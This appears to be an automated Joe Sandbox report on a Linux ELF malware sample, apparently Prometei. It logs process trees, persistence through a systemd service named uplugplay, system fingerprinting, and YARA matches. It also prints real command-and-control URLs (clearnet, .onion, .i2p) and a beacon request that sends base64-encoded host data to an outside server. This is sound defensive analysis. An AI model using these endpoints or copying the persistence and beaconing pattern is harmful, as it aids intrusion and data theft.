Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
PMidZ9jAKZ

Overview

General Information

Sample Name:PMidZ9jAKZ
Analysis ID:559888
MD5:82e6b25291d35cee856681da70aae3fd
SHA1:13af6d48bd4bf48a1a8333e4a54a0fb2d84e0599
SHA256:47b5033a6623bcdb51a7291d85df39adbc9f9cfc82281739ef47e1c0263c37bb
Tags:64elf
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found Tor onion address
Drops files in suspicious directories
Sample deletes itself
Sample is packed with UPX
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "uname" command used to read OS and architecture name
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample listens on a socket
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Executes the "rm" command used to delete files or directories
Executes the "pgrep" command search for and/or send signals to processes

Classification

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:559888
Start date:26.01.2022
Start time:00:02:15
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:PMidZ9jAKZ
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.evad.lin@0/6@2/0
  • VT rate limit hit for: http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528
Command:/tmp/PMidZ9jAKZ
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • PMidZ9jAKZ (PID: 5270, Parent: 5112, MD5: 82e6b25291d35cee856681da70aae3fd) Arguments: /tmp/PMidZ9jAKZ
    • sh (PID: 5273, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep PMidZ9jAKZ"
      • sh New Fork (PID: 5274, Parent: 5273)
      • pgrep (PID: 5274, Parent: 5273, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep PMidZ9jAKZ
    • sh (PID: 5277, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof PMidZ9jAKZ"
      • sh New Fork (PID: 5278, Parent: 5277)
      • pidof (PID: 5278, Parent: 5277, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof PMidZ9jAKZ
    • sh (PID: 5283, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 5284, Parent: 5283)
      • pgrep (PID: 5284, Parent: 5283, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • sh (PID: 5287, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 5288, Parent: 5287)
      • pgrep (PID: 5288, Parent: 5287, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • sh (PID: 5291, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 5292, Parent: 5291)
      • pidof (PID: 5292, Parent: 5291, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • sh (PID: 5295, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 5296, Parent: 5295)
      • systemctl (PID: 5296, Parent: 5295, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • sh (PID: 5310, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 5311, Parent: 5310)
      • systemctl (PID: 5311, Parent: 5310, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • sh (PID: 5315, Parent: 5270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 5316, Parent: 5315)
      • systemctl (PID: 5316, Parent: 5315, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 5298, Parent: 5297)
  • snapd-env-generator (PID: 5298, Parent: 5297, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5313, Parent: 5312)
  • snapd-env-generator (PID: 5313, Parent: 5312, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5319, Parent: 1)
  • uplugplay (PID: 5319, Parent: 1, MD5: 82e6b25291d35cee856681da70aae3fd) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 5330, Parent: 5319)
      • sh (PID: 5331, Parent: 5330, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 5332, Parent: 5331)
        • uplugplay (PID: 5332, Parent: 5331, MD5: 82e6b25291d35cee856681da70aae3fd) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 5338, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /proc/cpuinfo"
            • sh New Fork (PID: 5339, Parent: 5338)
            • cat (PID: 5339, Parent: 5338, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /proc/cpuinfo
          • sh (PID: 5342, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5344, Parent: 5342)
            • dmidecode (PID: 5344, Parent: 5342, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5347, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5348, Parent: 5347)
            • dmidecode (PID: 5348, Parent: 5347, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5351, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5352, Parent: 5351)
            • dmidecode (PID: 5352, Parent: 5351, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5355, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5356, Parent: 5355)
            • dmidecode (PID: 5356, Parent: 5355, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5361, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5362, Parent: 5361)
            • dmidecode (PID: 5362, Parent: 5361, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5365, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5366, Parent: 5365)
            • dmidecode (PID: 5366, Parent: 5365, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5369, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 5370, Parent: 5369)
            • dmidecode (PID: 5370, Parent: 5369, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 5374, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/os-release"
            • sh New Fork (PID: 5375, Parent: 5374)
            • cat (PID: 5375, Parent: 5374, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/os-release
          • sh (PID: 5378, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 5379, Parent: 5378)
            • uptime (PID: 5379, Parent: 5378, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 5398, Parent: 5332, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 5399, Parent: 5398)
            • uname (PID: 5399, Parent: 5398, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • dash New Fork (PID: 5400, Parent: 4332)
  • cat (PID: 5400, Parent: 4332, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.hDfDW3v72C
  • dash New Fork (PID: 5401, Parent: 4332)
  • head (PID: 5401, Parent: 4332, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5402, Parent: 4332)
  • tr (PID: 5402, Parent: 4332, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5403, Parent: 4332)
  • cut (PID: 5403, Parent: 4332, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5404, Parent: 4332)
  • cat (PID: 5404, Parent: 4332, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.hDfDW3v72C
  • dash New Fork (PID: 5405, Parent: 4332)
  • head (PID: 5405, Parent: 4332, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5406, Parent: 4332)
  • tr (PID: 5406, Parent: 4332, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5407, Parent: 4332)
  • cut (PID: 5407, Parent: 4332, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5408, Parent: 4332)
  • rm (PID: 5408, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.hDfDW3v72C /tmp/tmp.cWP5WAFbt1 /tmp/tmp.FmPMX5ZHi1
  • cleanup
SourceRuleDescriptionAuthorStrings
PMidZ9jAKZSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplaySUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PMidZ9jAKZVirustotal: Detection: 16%Perma Link
Source: /usr/bin/pgrep (PID: 5274)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5288)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5332)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5379)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/cat (PID: 5339)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33608 version: TLS 1.2

Networking

barindex
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: Mhttp://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
Source: /usr/sbin/uplugplay (PID: 5332)Socket: 0.0.0.0::88Jump to behavior
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528 HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MDM6MTUgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNjQsIDEuMTQsIDAuNDUNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=7B1B0KLF45MTZ528&h=galassia&enckey=Ta1pdKIGXeZ1gPqtqpAABWQrTGI0Txhm/ucNR52U8J5cnErk73rBpKALxCiDcII8+wildfyzdI25Z1b/cPdmTXmrC+gX0Zfad6sapNc7u1PZiulmHAIVxJcZdMx4erMzjKsG3T5Ch+VvH6qExs+Mk9ylUCSqY2to5XfV7PA21Vk= HTTP/1.0Host: p3.feefreepool.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33608
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33608 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgi
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg
Source: PMidZ9jAKZ, uplugplay.10.drString found in binary or memory: http://upx.sf.net
Source: PMidZ9jAKZ, 5270.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: motd-news.113.drString found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation
Source: unknownDNS traffic detected: queries for: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528 HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MDM6MTUgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNjQsIDEuMTQsIDAuNDUNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=7B1B0KLF45MTZ528&h=galassia&enckey=Ta1pdKIGXeZ1gPqtqpAABWQrTGI0Txhm/ucNR52U8J5cnErk73rBpKALxCiDcII8+wildfyzdI25Z1b/cPdmTXmrC+gX0Zfad6sapNc7u1PZiulmHAIVxJcZdMx4erMzjKsG3T5Ch+VvH6qExs+Mk9ylUCSqY2to5XfV7PA21Vk= HTTP/1.0Host: p3.feefreepool.net
Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33608 version: TLS 1.2
Source: LOAD without section mappingsProgram segment: 0x400000
Source: PMidZ9jAKZ, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engineClassification label: mal64.evad.lin@0/6@2/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Source: /tmp/PMidZ9jAKZ (PID: 5270)File written: /usr/sbin/uplugplayJump to dropped file
Source: /usr/sbin/uplugplay (PID: 5332)Reads from proc file: /proc/statJump to behavior
Source: /usr/bin/cat (PID: 5339)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5146/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5146/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1582/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1582/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/3088/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/3088/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/110/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/110/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/111/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/111/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1579/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1579/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/112/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/112/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1699/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1699/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/113/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/113/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1335/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1335/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1698/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1698/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/114/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/114/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/235/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/235/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1334/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1334/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1576/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1576/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/2302/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/2302/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/115/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/115/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/236/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/236/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/116/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/116/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/237/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/237/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/117/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/117/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/118/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/118/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/910/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/910/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5138/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5138/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/912/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/912/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/2307/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/2307/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/918/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/918/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5273/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5273/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5034/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5034/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5277/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5277/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1594/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1594/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5270/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/5270/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/120/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/120/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/121/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/121/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1349/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1349/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/122/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/122/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/243/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5284)File opened: /proc/243/cmdlineJump to behavior
